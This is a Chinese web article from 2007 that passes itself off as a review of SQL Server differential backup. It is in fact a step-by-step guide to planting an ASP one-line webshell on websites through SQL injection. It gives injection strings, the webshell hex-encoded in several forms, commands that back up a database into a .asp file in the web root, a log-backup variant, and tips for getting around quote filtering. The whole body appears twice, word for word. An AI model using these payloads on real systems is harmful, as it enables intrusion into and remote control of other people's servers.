復習一下sql server的差異備份
更新時間:2007年03月08日 00:00:00 作者:
MSSQL差異備份,就是和前一次備份作對比,把不一樣的內(nèi)容備份下來,這樣,只要前一次備份后,插入新的內(nèi)容,差異備份就可以把剛插入的內(nèi)容備份出來,而這個備份文件將大大減少,得到webShell的成功也提高了不少!
差異備份的流程大概這樣:
1.完整備份一次(保存位置當然可以改)
backup database 庫名 to disk = 'c:\ddd.bak';--
2.創(chuàng)建表并插曲入數(shù)據(jù)
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.進行差異備份
backup database 庫名 to disk='目標位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句話木馬的內(nèi)容:<%execute(request("a"))%>
如下是網(wǎng)上常見的差異備份代碼,思路一樣!
===================================================
利用差異備份提高提高backupwebshell的成功率,減少文件大小
步驟:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT
0x77006F006B0061006F002E00620061006B00為wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
聲明:方法不是我想的,我只是寫工具,默認得到shell是
<%execute(request("a"))%>
===============================================================
我發(fā)現(xiàn)上面代碼,有時會無效,而直接用
backup database 庫名 to disk = 'c:\ddd.bak'
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
backup database 庫名 to disk='目標位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
卻可以成功,所以把最原始的方法寫出來!思路是前人所創(chuàng),這不說大家也知道的!
庫名 必須要有效的庫名,一般注入工具都可以得到!如果某站過濾 "‘",就要把字符內(nèi)容轉為數(shù)值了!
網(wǎng)上還有l(wèi)og增量備份的,我也把他記錄一下
=====================================================
另一種log增量備份技術:
';alter database null set RECOVERY FULL--
';create table cmd (a image)--
';backup log null to disk = 'f:\cmd' with init--
';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--
';backup log null to disk = '備份路徑'--
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句話小馬16進制轉來的
說到一句話馬,還可以有這么幾種寫法:
a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).<script language=VBScript runat=server>execute request("a")</script>
e).<%25Execute(request("a"))%25>
差異備份的流程大概這樣:
1.完整備份一次(保存位置當然可以改)
backup database 庫名 to disk = 'c:\ddd.bak';--
2.創(chuàng)建表并插曲入數(shù)據(jù)
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.進行差異備份
backup database 庫名 to disk='目標位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上面
0x3C25657865637574652872657175657374282261222929253E
就是一句話木馬的內(nèi)容:<%execute(request("a"))%>
如下是網(wǎng)上常見的差異備份代碼,思路一樣!
===================================================
利用差異備份提高提高backupwebshell的成功率,減少文件大小
步驟:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT
0x77006F006B0061006F002E00620061006B00為wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
聲明:方法不是我想的,我只是寫工具,默認得到shell是
<%execute(request("a"))%>
===============================================================
我發(fā)現(xiàn)上面代碼,有時會無效,而直接用
backup database 庫名 to disk = 'c:\ddd.bak'
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
backup database 庫名 to disk='目標位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
卻可以成功,所以把最原始的方法寫出來!思路是前人所創(chuàng),這不說大家也知道的!
庫名 必須要有效的庫名,一般注入工具都可以得到!如果某站過濾 "‘",就要把字符內(nèi)容轉為數(shù)值了!
網(wǎng)上還有l(wèi)og增量備份的,我也把他記錄一下
=====================================================
另一種log增量備份技術:
';alter database null set RECOVERY FULL--
';create table cmd (a image)--
';backup log null to disk = 'f:\cmd' with init--
';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA)--
';backup log null to disk = '備份路徑'--
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句話小馬16進制轉來的
說到一句話馬,還可以有這么幾種寫法:
a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).<script language=VBScript runat=server>execute request("a")</script>
e).<%25Execute(request("a"))%25>
相關文章
order by newid() 各種數(shù)據(jù)庫隨機查詢的方法
order by newid() 各種數(shù)據(jù)庫隨機查詢的方法,需要的朋友可以參考一下2013-04-04sql自動化檢查和分析工具 之soar和soar-web 安裝和使用體驗
這篇文章主要介紹了sql自動化檢查和分析工具 之soar和soar-web 安裝和使用體驗,本文分步驟給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下2020-04-04SQL Server 使用join all優(yōu)化 or 查詢速度
一個老項目,加載列表奇慢,超過10秒鐘, 主要涉及兩個表, user表,procuts表。因為涉及多層代理,使用site字段保存目錄2020-09-09基于SQL Server OS的任務調(diào)度機制詳解
本篇文章小編為大家介紹,基于SQL Server OS的任務調(diào)度機制詳解。需要的朋友參考下2013-04-04當master down掉后,pt-heartbeat不斷重試會導致內(nèi)存緩慢增長的原因及解決辦法
這篇文章主要介紹了當master down掉后,pt-heartbeat不斷重試會導致內(nèi)存緩慢增長的原因及解決辦法,需要的朋友可以參考下2016-10-10SQL?Server數(shù)據(jù)庫備份和恢復數(shù)據(jù)庫的全過程
最近在功能調(diào)試前需要先將測試數(shù)據(jù)庫備份,然后功能調(diào)試之后再將測試數(shù)據(jù)庫還原,這樣就可以重復的進行功能調(diào)試,這篇文章主要給大家介紹了關于SQL?Server數(shù)據(jù)庫備份和恢復數(shù)據(jù)庫的相關資料,需要的朋友可以參考下2022-06-06SQL Server誤區(qū)30日談 第27天 使用BACKUP WITH CHECKSUM可以替代DBCC CheckDB
乍一看,由于BACKUP WITH CHECKSUM會檢測所有分配出去的頁的校驗和的值,這個誤區(qū)貌似是這么回事,但實際上并不是這么回事2013-01-01select into 和 insert into select 兩種表復制語句
select into 和 insert into select 兩種表復制語句,需要的朋友可以參考下。2009-10-10